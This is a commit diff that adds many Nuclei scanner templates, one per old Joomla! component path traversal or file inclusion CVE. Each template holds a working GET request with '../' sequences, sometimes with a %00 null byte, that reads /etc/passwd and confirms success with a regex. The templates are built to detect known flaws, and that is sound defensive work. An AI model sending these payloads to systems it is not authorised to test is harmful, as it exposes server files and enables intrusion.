Nuclei 8.6.6
parent
3a091d3477
commit
4faf4dc1d6
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_album 1.14 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1302
|
||||
|
||||
info:
|
||||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1315
|
||||
|
||||
info:
|
||||
name: Joomla! Component webERPcustomer - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11999
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1315
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1340
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33797
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1340
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1461
|
||||
|
||||
info:
|
||||
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12232
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1461
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1469
|
||||
|
||||
info:
|
||||
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12146
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1469
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1478
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12145
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1478
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1491
|
||||
|
||||
info:
|
||||
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12318
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1491
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1540
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_blog - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11625
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1540
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1603
|
||||
|
||||
info:
|
||||
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12284
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1603
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1653
|
||||
|
||||
info:
|
||||
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12430
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1653
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1658
|
||||
|
||||
info:
|
||||
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12427
|
||||
